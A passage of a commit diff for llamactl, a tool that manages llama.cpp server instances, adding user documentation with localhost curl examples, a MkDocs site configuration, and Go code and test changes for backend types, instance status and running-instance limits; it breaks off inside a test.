```
### Get Instance Details
Get detailed information about a specific instance.
```http
GET /api/v1/instances/{name}
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Create Instance
Create and start a new instance.
```http
POST /api/v1/instances/{name}
```
**Request Body:** JSON object with instance configuration. See [Managing Instances](managing-instances.md) for available configuration options.
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Update Instance
Update an existing instance configuration. See [Managing Instances](managing-instances.md) for available configuration options.
```http
PUT /api/v1/instances/{name}
```
**Request Body:** JSON object with configuration fields to update.
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Delete Instance
Stop and remove an instance.
```http
DELETE /api/v1/instances/{name}
```
**Response:** `204 No Content`
## Instance Operations
### Start Instance
Start a stopped instance.
```http
POST /api/v1/instances/{name}/start
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "starting",
"created": 1705312200
}
```
**Error Responses:**
- `409 Conflict`: Maximum number of running instances reached
- `500 Internal Server Error`: Failed to start instance
### Stop Instance
Stop a running instance.
```http
POST /api/v1/instances/{name}/stop
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "stopping",
"created": 1705312200
}
```
### Restart Instance
Restart an instance (stop then start).
```http
POST /api/v1/instances/{name}/restart
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "restarting",
"created": 1705312200
}
```
### Get Instance Logs
Retrieve instance logs.
```http
GET /api/v1/instances/{name}/logs
```
**Query Parameters:**
- `lines`: Number of lines to return (default: all lines, use -1 for all)
**Response:** Plain text log output
**Example:**
```bash
curl "http://localhost:8080/api/v1/instances/my-instance/logs?lines=100"
```
### Proxy to Instance
Proxy HTTP requests directly to the llama-server instance.
```http
GET /api/v1/instances/{name}/proxy/*
POST /api/v1/instances/{name}/proxy/*
```
This endpoint forwards all requests to the underlying llama-server instance running on its configured port. The proxy strips the `/api/v1/instances/{name}/proxy` prefix and forwards the remaining path to the instance.
**Example - Check Instance Health:**
```bash
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model/proxy/health
```
This forwards the request to `http://instance-host:instance-port/health` on the actual llama-server instance.
**Error Responses:**
- `503 Service Unavailable`: Instance is not running
## OpenAI-Compatible API
Llamactl provides OpenAI-compatible endpoints for inference operations.
### List Models
List all instances in OpenAI-compatible format.
```http
GET /v1/models
```
**Response:**
```json
{
"object": "list",
"data": [
{
"id": "llama2-7b",
"object": "model",
"created": 1705312200,
"owned_by": "llamactl"
}
]
}
```
### Chat Completions, Completions, Embeddings
All OpenAI-compatible inference endpoints are available:
```http
POST /v1/chat/completions
POST /v1/completions
POST /v1/embeddings
POST /v1/rerank
POST /v1/reranking
```
**Request Body:** Standard OpenAI format with `model` field specifying the instance name
**Example:**
```json
{
"model": "llama2-7b",
"messages": [
{
"role": "user",
"content": "Hello, how are you?"
}
]
}
```
The server routes requests to the appropriate instance based on the `model` field in the request body. Instances with on-demand starting enabled will be automatically started if not running. For configuration details, see [Managing Instances](managing-instances.md).
**Error Responses:**
- `400 Bad Request`: Invalid request body or missing model name
- `503 Service Unavailable`: Instance is not running and on-demand start is disabled
- `409 Conflict`: Cannot start instance due to maximum instances limit
## Instance Status Values
Instances can have the following status values:
- `stopped`: Instance is not running
- `running`: Instance is running and ready to accept requests
- `failed`: Instance failed to start or crashed
## Error Responses
All endpoints may return error responses in the following format:
```json
{
"error": "Error message description"
}
```
### Common HTTP Status Codes
- `200`: Success
- `201`: Created
- `204`: No Content (successful deletion)
- `400`: Bad Request (invalid parameters or request body)
- `401`: Unauthorized (missing or invalid API key)
- `403`: Forbidden (insufficient permissions)
- `404`: Not Found (instance not found)
- `409`: Conflict (instance already exists, max instances reached)
- `500`: Internal Server Error
- `503`: Service Unavailable (instance not running)
## Examples
### Complete Instance Lifecycle
```bash
# Create and start instance
curl -X POST http://localhost:8080/api/v1/instances/my-model \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-api-key" \
-d '{
"model": "/models/llama-2-7b.gguf"
}'
# Check instance status
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model
# Get instance logs
curl -H "Authorization: Bearer your-api-key" \
"http://localhost:8080/api/v1/instances/my-model/logs?lines=50"
# Use OpenAI-compatible chat completions
curl -X POST http://localhost:8080/v1/chat/completions \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-inference-api-key" \
-d '{
"model": "my-model",
"messages": [
{"role": "user", "content": "Hello!"}
],
"max_tokens": 100
}'
# Stop instance
curl -X POST -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model/stop
# Delete instance
curl -X DELETE -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model
```
### Using the Proxy Endpoint
You can also directly proxy requests to the llama-server instance:
```bash
# Direct proxy to instance (bypasses OpenAI compatibility layer)
curl -X POST http://localhost:8080/api/v1/instances/my-model/proxy/completion \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-api-key" \
-d '{
"prompt": "Hello, world!",
"n_predict": 50
}'
```
## Swagger Documentation
If swagger documentation is enabled in the server configuration, you can access the interactive API documentation at:
```
http://localhost:8080/swagger/
```
This provides a complete interactive interface for testing all API endpoints.

View File

@@ -0,0 +1,190 @@
# Managing Instances
Learn how to effectively manage your Llama.cpp instances with Llamactl through both the Web UI and API.
## Overview
Llamactl provides two ways to manage instances:
- **Web UI**: Accessible at `http://localhost:8080` with an intuitive dashboard
- **REST API**: Programmatic access for automation and integration
![Dashboard Screenshot](../images/dashboard.png)
### Authentication
If authentication is enabled:
1. Navigate to the web UI
2. Enter your credentials
3. Bearer token is stored for the session
### Theme Support
- Switch between light and dark themes
- Setting is remembered across sessions
## Instance Cards
Each instance is displayed as a card showing:
- **Instance name**
- **Health status badge** (unknown, ready, error, failed)
- **Action buttons** (start, stop, edit, logs, delete)
## Create Instance
### Via Web UI
![Create Instance Screenshot](../images/create_instance.png)
1. Click the **"Create Instance"** button on the dashboard
2. Enter a unique **Name** for your instance (only required field)
3. Configure model source (choose one):
- **Model Path**: Full path to your downloaded GGUF model file
- **HuggingFace Repo**: Repository name (e.g., `unsloth/gemma-3-27b-it-GGUF`)
- **HuggingFace File**: Specific file within the repo (optional, uses default if not specified)
4. Configure optional instance management settings:
- **Auto Restart**: Automatically restart instance on failure
- **Max Restarts**: Maximum number of restart attempts
- **Restart Delay**: Delay in seconds between restart attempts
- **On Demand Start**: Start instance when receiving a request to the OpenAI compatible endpoint
- **Idle Timeout**: Minutes before stopping idle instance (set to 0 to disable)
5. Configure optional llama-server backend options:
- **Threads**: Number of CPU threads to use
- **Context Size**: Context window size (ctx_size)
- **GPU Layers**: Number of layers to offload to GPU
- **Port**: Network port (auto-assigned by llamactl if not specified)
- **Additional Parameters**: Any other llama-server command line options (see [llama-server documentation](https://github.com/ggerganov/llama.cpp/blob/master/examples/server/README.md))
6. Click **"Create"** to save the instance
### Via API
```bash
# Create instance with local model file
curl -X POST http://localhost:8080/api/instances/my-instance \
-H "Content-Type: application/json" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/model.gguf",
"threads": 8,
"ctx_size": 4096
}
}'
# Create instance with HuggingFace model
curl -X POST http://localhost:8080/api/instances/gemma-3-27b \
-H "Content-Type: application/json" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"hf_repo": "unsloth/gemma-3-27b-it-GGUF",
"hf_file": "gemma-3-27b-it-GGUF.gguf",
"gpu_layers": 32
},
"auto_restart": true,
"max_restarts": 3
}'
```
## Start Instance
### Via Web UI
1. Click the **"Start"** button on an instance card
2. Watch the status change to "Unknown"
3. Monitor progress in the logs
4. Instance status changes to "Ready" when ready
### Via API
```bash
curl -X POST http://localhost:8080/api/instances/{name}/start
```
## Stop Instance
### Via Web UI
1. Click the **"Stop"** button on an instance card
2. Instance gracefully shuts down
### Via API
```bash
curl -X POST http://localhost:8080/api/instances/{name}/stop
```
## Edit Instance
### Via Web UI
1. Click the **"Edit"** button on an instance card
2. Modify settings in the configuration dialog
3. Changes require instance restart to take effect
4. Click **"Update & Restart"** to apply changes
### Via API
Modify instance settings:
```bash
curl -X PUT http://localhost:8080/api/instances/{name} \
-H "Content-Type: application/json" \
-d '{
"backend_options": {
"threads": 8,
"context_size": 4096
}
}'
```
!!! note
Configuration changes require restarting the instance to take effect.
## View Logs
### Via Web UI
1. Click the **"Logs"** button on any instance card
2. Real-time log viewer opens
### Via API
Check instance status in real-time:
```bash
# Get instance details
curl http://localhost:8080/api/instances/{name}/logs
```
## Delete Instance
### Via Web UI
1. Click the **"Delete"** button on an instance card
2. Only stopped instances can be deleted
3. Confirm deletion in the dialog
### Via API
```bash
curl -X DELETE http://localhost:8080/api/instances/{name}
```
## Instance Proxy
Llamactl proxies all requests to the underlying llama-server instances.
```bash
# Get instance details
curl http://localhost:8080/api/instances/{name}/proxy/
```
Check llama-server [docs](https://github.com/ggml-org/llama.cpp/blob/master/tools/server/README.md) for more information.
### Instance Health
#### Via Web UI
1. The health status badge is displayed on each instance card
#### Via API
Check the health status of your instances:
```bash
curl http://localhost:8080/api/instances/{name}/proxy/health
```

View File

@@ -0,0 +1,160 @@
# Troubleshooting
Issues specific to Llamactl deployment and operation.
## Configuration Issues
### Invalid Configuration
**Problem:** Invalid configuration preventing startup
**Solutions:**
1. Use minimal configuration:
```yaml
server:
host: "0.0.0.0"
port: 8080
instances:
port_range: [8000, 9000]
```
2. Check data directory permissions:
```bash
# Ensure data directory is writable (default: ~/.local/share/llamactl)
mkdir -p ~/.local/share/llamactl/{instances,logs}
```
## Instance Management Issues
### Model Loading Failures
**Problem:** Instance fails to start with model loading errors
**Common Solutions:**
- **llama-server not found:** Ensure `llama-server` binary is in PATH
- **Wrong model format:** Ensure model is in GGUF format
- **Insufficient memory:** Use smaller model or reduce context size
- **Path issues:** Use absolute paths to model files
### Memory Issues
**Problem:** Out of memory errors or system becomes unresponsive
**Solutions:**
1. **Reduce context size:**
```json
{
"n_ctx": 1024
}
```
2. **Use quantized models:**
- Try Q4_K_M instead of higher precision models
- Use smaller model variants (7B instead of 13B)
### GPU Configuration
**Problem:** GPU not being used effectively
**Solutions:**
1. **Configure GPU layers:**
```json
{
"n_gpu_layers": 35
}
```
### Advanced Instance Issues
**Problem:** Complex model loading, performance, or compatibility issues
Since llamactl uses `llama-server` under the hood, many instance-related issues are actually llama.cpp issues. For advanced troubleshooting:
**Resources:**
- **llama.cpp Documentation:** [https://github.com/ggml/llama.cpp](https://github.com/ggml/llama.cpp)
- **llama.cpp Issues:** [https://github.com/ggml/llama.cpp/issues](https://github.com/ggml/llama.cpp/issues)
- **llama.cpp Discussions:** [https://github.com/ggml/llama.cpp/discussions](https://github.com/ggml/llama.cpp/discussions)
**Testing directly with llama-server:**
```bash
# Test your model and parameters directly with llama-server
llama-server --model /path/to/model.gguf --port 8081 --n-gpu-layers 35
```
This helps determine if the issue is with llamactl or with the underlying llama.cpp/llama-server.
## API and Network Issues
### CORS Errors
**Problem:** Web UI shows CORS errors in browser console
**Solutions:**
1. **Configure allowed origins:**
```yaml
server:
allowed_origins:
- "http://localhost:3000"
- "https://yourdomain.com"
```
## Authentication Issues
**Problem:** API requests failing with authentication errors
**Solutions:**
1. **Disable authentication temporarily:**
```yaml
auth:
require_management_auth: false
require_inference_auth: false
```
2. **Configure API keys:**
```yaml
auth:
management_keys:
- "your-management-key"
inference_keys:
- "your-inference-key"
```
3. **Use correct Authorization header:**
```bash
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances
```
## Debugging and Logs
### Viewing Instance Logs
```bash
# Get instance logs via API
curl http://localhost:8080/api/v1/instances/{name}/logs
# Or check log files directly
tail -f ~/.local/share/llamactl/logs/{instance-name}.log
```
### Enable Debug Logging
```bash
export LLAMACTL_LOG_LEVEL=debug
llamactl
```
## Getting Help
When reporting issues, include:
1. **System information:**
```bash
llamactl --version
```
2. **Configuration file** (remove sensitive keys)
3. **Relevant log output**
4. **Steps to reproduce the issue**

68
mkdocs.yml Normal file
View File

@@ -0,0 +1,68 @@
site_name: Llamatl Documentation
site_description: User documentation for Llamatl - A management tool for Llama.cpp instances
site_author: Llamatl Team
site_url: https://llamactl.org
repo_name: lordmathis/llamactl
repo_url: https://github.com/lordmathis/llamactl
theme:
name: material
palette:
# Palette toggle for light mode
- scheme: default
primary: indigo
accent: indigo
toggle:
icon: material/brightness-7
name: Switch to dark mode
# Palette toggle for dark mode
- scheme: slate
primary: indigo
accent: indigo
toggle:
icon: material/brightness-4
name: Switch to light mode
features:
- navigation.tabs
- navigation.sections
- navigation.expand
- navigation.top
- search.highlight
- search.share
- content.code.copy
markdown_extensions:
- pymdownx.highlight:
anchor_linenums: true
- pymdownx.inlinehilite
- pymdownx.snippets
- pymdownx.superfences
- admonition
- pymdownx.details
- pymdownx.tabbed:
alternate_style: true
- attr_list
- md_in_html
- toc:
permalink: true
nav:
- Home: index.md
- Getting Started:
- Installation: getting-started/installation.md
- Quick Start: getting-started/quick-start.md
- Configuration: getting-started/configuration.md
- User Guide:
- Managing Instances: user-guide/managing-instances.md
- API Reference: user-guide/api-reference.md
- Troubleshooting: user-guide/troubleshooting.md
plugins:
- search
- git-revision-date-localized
extra:
social:
- icon: fontawesome/brands/github
link: https://github.com/lordmathis/llamactl

7
pkg/backends/backend.go Normal file
View File

@@ -0,0 +1,7 @@
package backends
type BackendType string
const (
BackendTypeLlamaCpp BackendType = "llama_cpp"
)

View File

@@ -55,6 +55,12 @@ type InstancesConfig struct {
// Maximum number of instances that can be created // Maximum number of instances that can be created
MaxInstances int `yaml:"max_instances"` MaxInstances int `yaml:"max_instances"`
// Maximum number of instances that can be running at the same time
MaxRunningInstances int `yaml:"max_running_instances,omitempty"`
// Enable LRU eviction for instance logs
EnableLRUEviction bool `yaml:"enable_lru_eviction"`
// Path to llama-server executable // Path to llama-server executable
LlamaExecutable string `yaml:"llama_executable"` LlamaExecutable string `yaml:"llama_executable"`
@@ -113,6 +119,8 @@ func LoadConfig(configPath string) (AppConfig, error) {
LogsDir: filepath.Join(getDefaultDataDirectory(), "logs"), LogsDir: filepath.Join(getDefaultDataDirectory(), "logs"),
AutoCreateDirs: true, AutoCreateDirs: true,
MaxInstances: -1, // -1 means unlimited MaxInstances: -1, // -1 means unlimited
MaxRunningInstances: -1, // -1 means unlimited
EnableLRUEviction: true,
LlamaExecutable: "llama-server", LlamaExecutable: "llama-server",
DefaultAutoRestart: true, DefaultAutoRestart: true,
DefaultMaxRestarts: 3, DefaultMaxRestarts: 3,
@@ -211,6 +219,16 @@ func loadEnvVars(cfg *AppConfig) {
cfg.Instances.MaxInstances = m cfg.Instances.MaxInstances = m
} }
} }
if maxRunning := os.Getenv("LLAMACTL_MAX_RUNNING_INSTANCES"); maxRunning != "" {
if m, err := strconv.Atoi(maxRunning); err == nil {
cfg.Instances.MaxRunningInstances = m
}
}
if enableLRUEviction := os.Getenv("LLAMACTL_ENABLE_LRU_EVICTION"); enableLRUEviction != "" {
if b, err := strconv.ParseBool(enableLRUEviction); err == nil {
cfg.Instances.EnableLRUEviction = b
}
}
if llamaExec := os.Getenv("LLAMACTL_LLAMA_EXECUTABLE"); llamaExec != "" { if llamaExec := os.Getenv("LLAMACTL_LLAMA_EXECUTABLE"); llamaExec != "" {
cfg.Instances.LlamaExecutable = llamaExec cfg.Instances.LlamaExecutable = llamaExec
} }

View File

@@ -5,7 +5,7 @@ import (
"encoding/json" "encoding/json"
"fmt" "fmt"
"io" "io"
"llamactl/pkg/backends/llamacpp" "llamactl/pkg/backends"
"llamactl/pkg/config" "llamactl/pkg/config"
"log" "log"
"net/http" "net/http"
@@ -29,52 +29,6 @@ func (realTimeProvider) Now() time.Time {
return time.Now() return time.Now()
} }
type CreateInstanceOptions struct {
// Auto restart
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
RestartDelay *int `json:"restart_delay,omitempty"`
// On demand start
OnDemandStart *bool `json:"on_demand_start,omitempty"`
// Idle timeout
IdleTimeout *int `json:"idle_timeout,omitempty"`
// LlamaServerOptions contains the options for the llama server
llamacpp.LlamaServerOptions `json:",inline"`
}
// UnmarshalJSON implements custom JSON unmarshaling for CreateInstanceOptions
// This is needed because the embedded LlamaServerOptions has its own UnmarshalJSON
// which can interfere with proper unmarshaling of the pointer fields
func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
// First, unmarshal into a temporary struct without the embedded type
type tempCreateOptions struct {
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
RestartDelay *int `json:"restart_delay,omitempty"`
OnDemandStart *bool `json:"on_demand_start,omitempty"`
IdleTimeout *int `json:"idle_timeout,omitempty"`
}
var temp tempCreateOptions
if err := json.Unmarshal(data, &temp); err != nil {
return err
}
// Copy the pointer fields
c.AutoRestart = temp.AutoRestart
c.MaxRestarts = temp.MaxRestarts
c.RestartDelay = temp.RestartDelay
c.OnDemandStart = temp.OnDemandStart
c.IdleTimeout = temp.IdleTimeout
// Now unmarshal the embedded LlamaServerOptions
if err := json.Unmarshal(data, &c.LlamaServerOptions); err != nil {
return err
}
return nil
}
// Process represents a running instance of the llama server // Process represents a running instance of the llama server
type Process struct { type Process struct {
Name string `json:"name"` Name string `json:"name"`
@@ -82,7 +36,8 @@ type Process struct {
globalSettings *config.InstancesConfig globalSettings *config.InstancesConfig
// Status // Status
Running bool `json:"running"` Status InstanceStatus `json:"status"`
onStatusChange func(oldStatus, newStatus InstanceStatus)
// Creation time // Creation time
Created int64 `json:"created,omitempty"` // Unix timestamp when the instance was created Created int64 `json:"created,omitempty"` // Unix timestamp when the instance was created
@@ -109,105 +64,23 @@ type Process struct {
timeProvider TimeProvider `json:"-"` // Time provider for testing timeProvider TimeProvider `json:"-"` // Time provider for testing
} }
// validateAndCopyOptions validates and creates a deep copy of the provided options
// It applies validation rules and returns a safe copy
func validateAndCopyOptions(name string, options *CreateInstanceOptions) *CreateInstanceOptions {
optionsCopy := &CreateInstanceOptions{}
if options != nil {
// Copy the embedded LlamaServerOptions
optionsCopy.LlamaServerOptions = options.LlamaServerOptions
// Copy and validate pointer fields
if options.AutoRestart != nil {
autoRestart := *options.AutoRestart
optionsCopy.AutoRestart = &autoRestart
}
if options.MaxRestarts != nil {
maxRestarts := *options.MaxRestarts
if maxRestarts < 0 {
log.Printf("Instance %s MaxRestarts value (%d) cannot be negative, setting to 0", name, maxRestarts)
maxRestarts = 0
}
optionsCopy.MaxRestarts = &maxRestarts
}
if options.RestartDelay != nil {
restartDelay := *options.RestartDelay
if restartDelay < 0 {
log.Printf("Instance %s RestartDelay value (%d) cannot be negative, setting to 0 seconds", name, restartDelay)
restartDelay = 0
}
optionsCopy.RestartDelay = &restartDelay
}
if options.OnDemandStart != nil {
onDemandStart := *options.OnDemandStart
optionsCopy.OnDemandStart = &onDemandStart
}
if options.IdleTimeout != nil {
idleTimeout := *options.IdleTimeout
if idleTimeout < 0 {
log.Printf("Instance %s IdleTimeout value (%d) cannot be negative, setting to 0 minutes", name, idleTimeout)
idleTimeout = 0
}
optionsCopy.IdleTimeout = &idleTimeout
}
}
return optionsCopy
}
// applyDefaultOptions applies default values from global settings to any nil options
func applyDefaultOptions(options *CreateInstanceOptions, globalSettings *config.InstancesConfig) {
if globalSettings == nil {
return
}
if options.AutoRestart == nil {
defaultAutoRestart := globalSettings.DefaultAutoRestart
options.AutoRestart = &defaultAutoRestart
}
if options.MaxRestarts == nil {
defaultMaxRestarts := globalSettings.DefaultMaxRestarts
options.MaxRestarts = &defaultMaxRestarts
}
if options.RestartDelay == nil {
defaultRestartDelay := globalSettings.DefaultRestartDelay
options.RestartDelay = &defaultRestartDelay
}
if options.OnDemandStart == nil {
defaultOnDemandStart := globalSettings.DefaultOnDemandStart
options.OnDemandStart = &defaultOnDemandStart
}
if options.IdleTimeout == nil {
defaultIdleTimeout := 0
options.IdleTimeout = &defaultIdleTimeout
}
}
// NewInstance creates a new instance with the given name, log path, and options // NewInstance creates a new instance with the given name, log path, and options
func NewInstance(name string, globalSettings *config.InstancesConfig, options *CreateInstanceOptions) *Process { func NewInstance(name string, globalSettings *config.InstancesConfig, options *CreateInstanceOptions, onStatusChange func(oldStatus, newStatus InstanceStatus)) *Process {
// Validate and copy options // Validate and copy options
optionsCopy := validateAndCopyOptions(name, options) options.ValidateAndApplyDefaults(name, globalSettings)
// Apply defaults
applyDefaultOptions(optionsCopy, globalSettings)
// Create the instance logger // Create the instance logger
logger := NewInstanceLogger(name, globalSettings.LogsDir) logger := NewInstanceLogger(name, globalSettings.LogsDir)
return &Process{ return &Process{
Name: name, Name: name,
options: optionsCopy, options: options,
globalSettings: globalSettings, globalSettings: globalSettings,
logger: logger, logger: logger,
timeProvider: realTimeProvider{}, timeProvider: realTimeProvider{},
Created: time.Now().Unix(), Created: time.Now().Unix(),
Status: Stopped,
onStatusChange: onStatusChange,
} }
} }
@@ -217,6 +90,30 @@ func (i *Process) GetOptions() *CreateInstanceOptions {
return i.options return i.options
} }
func (i *Process) GetPort() int {
i.mu.RLock()
defer i.mu.RUnlock()
if i.options != nil {
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
return i.options.LlamaServerOptions.Port
}
}
return 0
}
func (i *Process) GetHost() string {
i.mu.RLock()
defer i.mu.RUnlock()
if i.options != nil {
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
return i.options.LlamaServerOptions.Host
}
}
return ""
}
func (i *Process) SetOptions(options *CreateInstanceOptions) { func (i *Process) SetOptions(options *CreateInstanceOptions) {
i.mu.Lock() i.mu.Lock()
defer i.mu.Unlock() defer i.mu.Unlock()
@@ -226,11 +123,10 @@ func (i *Process) SetOptions(options *CreateInstanceOptions) {
return return
} }
// Validate and copy options and apply defaults // Validate and copy options
optionsCopy := validateAndCopyOptions(i.Name, options) options.ValidateAndApplyDefaults(i.Name, i.globalSettings)
applyDefaultOptions(optionsCopy, i.globalSettings)
i.options = optionsCopy i.options = options
// Clear the proxy so it gets recreated with new options // Clear the proxy so it gets recreated with new options
i.proxy = nil i.proxy = nil
} }
@@ -253,7 +149,15 @@ func (i *Process) GetProxy() (*httputil.ReverseProxy, error) {
return nil, fmt.Errorf("instance %s has no options set", i.Name) return nil, fmt.Errorf("instance %s has no options set", i.Name)
} }
targetURL, err := url.Parse(fmt.Sprintf("http://%s:%d", i.options.Host, i.options.Port)) var host string
var port int
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
host = i.options.LlamaServerOptions.Host
port = i.options.LlamaServerOptions.Port
}
targetURL, err := url.Parse(fmt.Sprintf("http://%s:%d", host, port))
if err != nil { if err != nil {
return nil, fmt.Errorf("failed to parse target URL for instance %s: %w", i.Name, err) return nil, fmt.Errorf("failed to parse target URL for instance %s: %w", i.Name, err)
} }
@@ -283,44 +187,36 @@ func (i *Process) MarshalJSON() ([]byte, error) {
i.mu.RLock() i.mu.RLock()
defer i.mu.RUnlock() defer i.mu.RUnlock()
// Create a temporary struct with exported fields for JSON marshalling // Use anonymous struct to avoid recursion
temp := struct { type Alias Process
Name string `json:"name"` return json.Marshal(&struct {
*Alias
Options *CreateInstanceOptions `json:"options,omitempty"` Options *CreateInstanceOptions `json:"options,omitempty"`
Running bool `json:"running"`
Created int64 `json:"created,omitempty"`
}{ }{
Name: i.Name, Alias: (*Alias)(i),
Options: i.options, Options: i.options,
Running: i.Running, })
Created: i.Created,
}
return json.Marshal(temp)
} }
// UnmarshalJSON implements json.Unmarshaler for Instance // UnmarshalJSON implements json.Unmarshaler for Instance
func (i *Process) UnmarshalJSON(data []byte) error { func (i *Process) UnmarshalJSON(data []byte) error {
// Create a temporary struct for unmarshalling // Use anonymous struct to avoid recursion
temp := struct { type Alias Process
Name string `json:"name"` aux := &struct {
*Alias
Options *CreateInstanceOptions `json:"options,omitempty"` Options *CreateInstanceOptions `json:"options,omitempty"`
Running bool `json:"running"` }{
Created int64 `json:"created,omitempty"` Alias: (*Alias)(i),
}{} }
if err := json.Unmarshal(data, &temp); err != nil { if err := json.Unmarshal(data, aux); err != nil {
return err return err
} }
// Set the fields // Handle options with validation and defaults
i.Name = temp.Name if aux.Options != nil {
i.Running = temp.Running aux.Options.ValidateAndApplyDefaults(i.Name, i.globalSettings)
i.Created = temp.Created i.options = aux.Options
// Handle options with validation but no defaults
if temp.Options != nil {
i.options = validateAndCopyOptions(i.Name, temp.Options)
} }
return nil return nil

View File

@@ -2,6 +2,7 @@ package instance_test
import ( import (
"encoding/json" "encoding/json"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp" "llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config" "llamactl/pkg/config"
"llamactl/pkg/instance" "llamactl/pkg/instance"
@@ -18,28 +19,32 @@ func TestNewInstance(t *testing.T) {
} }
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
Port: 8080, Port: 8080,
}, },
} }
instance := instance.NewInstance("test-instance", globalSettings, options) // Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
if instance.Name != "test-instance" { inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
t.Errorf("Expected name 'test-instance', got %q", instance.Name)
if inst.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", inst.Name)
} }
if instance.Running { if inst.IsRunning() {
t.Error("New instance should not be running") t.Error("New instance should not be running")
} }
// Check that options were properly set with defaults applied // Check that options were properly set with defaults applied
opts := instance.GetOptions() opts := inst.GetOptions()
if opts.Model != "/path/to/model.gguf" { if opts.LlamaServerOptions.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model) t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model)
} }
if opts.Port != 8080 { if inst.GetPort() != 8080 {
t.Errorf("Expected port 8080, got %d", opts.Port) t.Errorf("Expected port 8080, got %d", inst.GetPort())
} }
// Check that defaults were applied // Check that defaults were applied
@@ -71,12 +76,16 @@ func TestNewInstance_WithRestartOptions(t *testing.T) {
AutoRestart: &autoRestart, AutoRestart: &autoRestart,
MaxRestarts: &maxRestarts, MaxRestarts: &maxRestarts,
RestartDelay: &restartDelay, RestartDelay: &restartDelay,
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
}, },
} }
instance := instance.NewInstance("test-instance", globalSettings, options) // Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
instance := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
opts := instance.GetOptions() opts := instance.GetOptions()
// Check that explicit values override defaults // Check that explicit values override defaults
@@ -100,17 +109,22 @@ func TestSetOptions(t *testing.T) {
} }
initialOptions := &instance.CreateInstanceOptions{ initialOptions := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
Port: 8080, Port: 8080,
}, },
} }
inst := instance.NewInstance("test-instance", globalSettings, initialOptions) // Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, initialOptions, mockOnStatusChange)
// Update options // Update options
newOptions := &instance.CreateInstanceOptions{ newOptions := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/new-model.gguf", Model: "/path/to/new-model.gguf",
Port: 8081, Port: 8081,
}, },
@@ -119,11 +133,11 @@ func TestSetOptions(t *testing.T) {
inst.SetOptions(newOptions) inst.SetOptions(newOptions)
opts := inst.GetOptions() opts := inst.GetOptions()
if opts.Model != "/path/to/new-model.gguf" { if opts.LlamaServerOptions.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.Model) t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.LlamaServerOptions.Model)
} }
if opts.Port != 8081 { if inst.GetPort() != 8081 {
t.Errorf("Expected updated port 8081, got %d", opts.Port) t.Errorf("Expected updated port 8081, got %d", inst.GetPort())
} }
// Check that defaults are still applied // Check that defaults are still applied
@@ -138,13 +152,17 @@ func TestGetProxy(t *testing.T) {
} }
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Host: "localhost", Host: "localhost",
Port: 8080, Port: 8080,
}, },
} }
inst := instance.NewInstance("test-instance", globalSettings, options) // Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
// Get proxy for the first time // Get proxy for the first time
proxy1, err := inst.GetProxy() proxy1, err := inst.GetProxy()
@@ -174,13 +192,17 @@ func TestMarshalJSON(t *testing.T) {
} }
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
